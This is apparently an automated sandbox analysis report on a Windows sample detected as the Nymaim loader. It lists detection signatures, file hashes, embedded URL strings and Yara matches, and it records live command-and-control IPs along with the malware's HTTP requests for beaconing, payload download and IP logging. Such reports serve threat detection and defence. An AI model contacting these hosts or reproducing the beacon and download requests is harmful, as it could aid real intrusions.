# Windows Analysis Report file.exe

## Overview

### General Information

 Sample Name: file.exe
 Analysis ID: 715150
 MD5: a3b774ed5023f56970eea0668ae65703
 SHA1: 3aebfec7980d1db1edbeccbb29044ea677be304b
 SHA256: f4f6bcce8531ffa055776e57b0f650b7f87049808e3b29d65fab79ec841ed81c
 Tags: exe

### Detection

Nymaim
 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Nymaim
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Binary is likely a compiled AutoIt script file
Machine Learning detection for sample
May check the online IP address of the machine
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

### AV Detection

 Source: file.exe ReversingLabs: Detection: 47%
 Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte URL Reputation: Label: malware
 Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte URL Reputation: Label: malware
 Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst URL Reputation: Label: malware
 Source: http://171.22.30.106/library.php URL Reputation: Label: malware
 Source: http://85.31.46.167/software.phpZ Virustotal: Detection: 5% Perma Link
 Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1] ReversingLabs: Detection: 28%
 Source: file.exe Joe Sandbox ML: detected
 Source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Nymaim {"C2 addresses": ["208.67.104.97", "85.31.46.167"]}
 Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
 Source: unknown HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49723 version: TLS 1.2
 Source: Binary string: [C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdbPXC-@ source: file.exe
 Source: Binary string: C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdb source: file.exe

### Networking

 Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe DNS query: name: iplogger.org
 Source: Malware configuration extractor IPs: 208.67.104.97
 Source: Malware configuration extractor IPs: 85.31.46.167
 Source: Joe Sandbox View ASN Name: GRAYSON-COLLIN-COMMUNICATIONSUS GRAYSON-COLLIN-COMMUNICATIONSUS
 Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
 Source: Joe Sandbox View IP Address: 148.251.234.83 148.251.234.83
 Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:32:32 GMT Server: Apache/2.4.41 (Ubuntu) Pragma: public Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Cache-Control: private Content-Disposition: attachment; filename="dll"; Content-Transfer-Encoding: binary Content-Length: 242176 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream
 Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:32:33 GMT Server: Apache/2.4.41 (Ubuntu) Pragma: public Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Cache-Control: private Content-Disposition: attachment; filename="soft"; Content-Transfer-Encoding: binary Content-Length: 3947920 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/octet-stream
 Source: global traffic HTTP traffic detected: GET /1Pz8p7 HTTP/1.1 User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36 Host: iplogger.org Connection: Keep-Alive
 Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
 Source: unknown TCP traffic detected without corresponding DNS query: 208.67.104.97
 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
 Source: file.exe, 00000000.00000000.306032693.000000000019B000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.php Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.php$Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.phpCoo Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.phpO Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.phpP Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.phpZ Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.phpl Source: file.exe, 
00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.phpll Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.phpstem32 Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.phpx Source: Cleaner.exe, 00000021.00000002.650563112.0000024B1A9C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 Source: Cleaner.exe, 00000021.00000003.379618679.0000024B7E186000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.378593000.0000024B7E185000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.383731927.0000024B7E1C4000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.379712996.0000024B7E18F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://en.w Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com Source: Cleaner.exe, 00000021.00000002.645497591.0000024B00418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://iplogger.org Source: Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name Source: Amcache.hve.30.dr String found in 
binary or memory: http://upx.sf.net Source: Cleaner.exe, 00000021.00000003.396394419.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.395554408.0000024B7E186000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.396105393.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.395852274.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.agfamonotype. Source: Cleaner.exe, 00000021.00000003.382564725.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 Source: Cleaner.exe, 00000021.00000003.387478626.0000024B7E190000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.387275120.0000024B7E190000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmled. 
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315966725.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315735295.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316522296.0000000003248000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316150109.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316216498.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316046017.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 
00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316402159.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174 Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com Source: Cleaner.exe, 00000021.00000003.391426565.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers Source: Cleaner.exe, 00000021.00000003.391036732.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.391426565.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/ Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/? Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8 Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers? 
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG Source: Cleaner.exe, 00000021.00000003.402175756.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.404838301.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405253003.0000024B7E1C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designerseK Source: Cleaner.exe, 00000021.00000003.391186193.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersers Source: Cleaner.exe, 00000021.00000003.391552464.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersp Source: Cleaner.exe, 00000021.00000003.402175756.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.404838301.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405489220.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.409086991.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405253003.0000024B7E1C6000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405791697.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersrsivo Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn Source: Cleaner.exe, 
00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/ Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com Source: Cleaner.exe, 00000021.00000003.387130957.0000024B7E1C3000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD Source: Cleaner.exe, 
00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315966725.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315735295.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316522296.0000000003248000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316150109.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316216498.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316046017.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 
00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316402159.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr String found in binary or memory: https://g-cleanit.hk Source: Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315966725.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315735295.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316522296.0000000003248000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316150109.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316216498.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316046017.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 
00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316402159.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org/1Pz8p7 Source: Cleaner.exe, 00000021.00000002.645456817.0000024B0040E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://iplogger.orgx Source: Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://take.rdrct-now.online/go/ZWKA?p78705p298845p1174  Source: unknown DNS traffic detected: queries for: iplogger.org  Source: global traffic HTTP traffic detected: GET /1Pz8p7 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36Host: iplogger.orgConnection: Keep-Alive Source: global traffic HTTP traffic detected: GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 208.67.104.97Connection: Keep-AliveCache-Control: no-cache Source: global traffic HTTP traffic detected: GET /software.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, 
*/*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: DHost: 85.31.46.167Connection: Keep-AliveCache-Control: no-cache Source: global traffic HTTP traffic detected: GET /software.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: EHost: 85.31.46.167Connection: Keep-AliveCache-Control: no-cache Source: global traffic HTTP traffic detected: GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 208.67.104.97Connection: Keep-AliveCache-Control: no-cache Source: global traffic HTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache Source: global traffic HTTP traffic detected: GET /storage/extension.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache Source: global 
traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
 Source: unknown HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49723 version: TLS 1.2

### E-Banking Fraud

 Source: Yara match File source: 0.3.file.exe.2210000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.8.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.7.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.6.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.11.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.31.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.27.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.22.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.14.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.6.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.4.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.28.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.10.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.24.raw.unpack, type: UNPACKEDPE Source: Yara match File
source: 0.0.file.exe.710e67.20.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.13.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.21.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.32.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.8.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.4.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.28.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.5.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.32.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.20.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.26.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.26.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.1.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.12.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.24.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.14.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.29.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.16.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.12.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.10.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.30.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.18.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.2.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.16.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 
0.0.file.exe.400000.19.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.25.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.9.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.2.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.15.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.30.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.18.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.17.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.23.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.3.file.exe.2210000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.22.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.265250551.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.306274144.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 